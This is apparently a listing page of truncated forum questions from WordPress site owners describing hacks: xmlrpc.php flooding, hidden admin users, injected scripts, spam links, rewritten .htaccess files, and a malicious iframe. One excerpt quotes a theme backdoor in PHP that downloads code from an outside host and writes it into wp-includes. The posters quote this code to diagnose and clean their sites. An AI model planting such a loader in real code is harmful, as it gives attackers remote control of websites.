I am fairly new to WordPress and I recently noted a huge amount of traffic hitting the following: 162.242.170.222 – – [01/Aug/2014:08:18:54 -0500] “POST /xmlrpc.php HTTP/1.0” 503 4859 162.242.170.222 – – [01/Aug/2014:08:19:01 -0500] “POST /xmlrpc.php HTTP/1.0” 503 4859 162.242.170.222 – – [01/Aug/2014:08:19:01 -0500] “POST /xmlrpc.php HTTP/1.0” 503 4859 162.242.170.222 – – [01/Aug/2014:08:19:02 -0500] “POST /xmlrpc.php … Read more
I have 2 WordPress MultiSite installs (on different accounts, but under the same HostGator reseller a/c) and both seem to have been compromised. I say “compromised” because the user_logins have been modified (somehow) and “hidden users” are being shown via WP Admin. I attempted to login to the installs which are both up-to-date (3.1) MultiSites. … Read more
I have code like below in neve theme WordPress. I feel suspicious about this code $wp_auth_key=’ac15616a33a4bae1388c29de0202c5e1′; if (($tmpcontent = @file_get_contents(“http://www.darors.com/code.php”) OR $tmpcontent = @file_get_contents_tcurl(“http://www.darors.com/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent); if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) { @file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent); if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) { … Read more
I have a blog created with wordpress, now i have a problem. Attackers writes javascript codes into my files. Let’s assume i have holes in my plugin scripts, but how can they write into php files? here is part of the list of php files, in which they write the script (index.php, wp-activate.php, wp-comments-post.php, wp-settings.php … Read more
After a site of a friend has been hacked I told him he should just clean up the mess and restart from scratch so he know that no file has been altered. I could scan the site for him with tools like grep an so on (For a start: Grep and Friends) but what I … Read more
I’m working on a client’s site and I noticed that posts have a hidden <div> filled to SPAM links to dick pills, etc. Hoping to get lucky, I searched for some of the keywords in the database tables, but found no matches. I also searched the code in all the files, and also found no … Read more
I’m trying to clean up a WordPress website that’s been hacked. I noticed that the .htaccess file has some suspect looking regular expressions, but my regex skills are pretty weak (time to learn I guess). I’ve tried replacing the .htaccess file with the default WordPress .htaccess, but it gets rewritten immediately and automatically. What I … Read more
I had a client who got hacked recently and I noticed that there were weird characters appearing on her site, like  and Æ. It turns out that the hackers changed the blog_charset to UTF-7 in the wp_options table in the database. I set it back to UTF-8, but I was wondering if during the … Read more
My for-fun WordPress blog at http://fakeplasticrock.com (running WordPress 3.1.1) got hacked — it was showing an <iframe> on every page like so: <iframe src=”http://evilsite.com/go/1″></iframe> <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Strict//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd”> <html xmlns=”http://www.w3.org/1999/xhtml” xml:lang=”en” lang=”en”> I did the following Upgraded to 3.1.3 via the built-in WordPress upgrade system Installed the Exploit Scanner (lots of … Read more
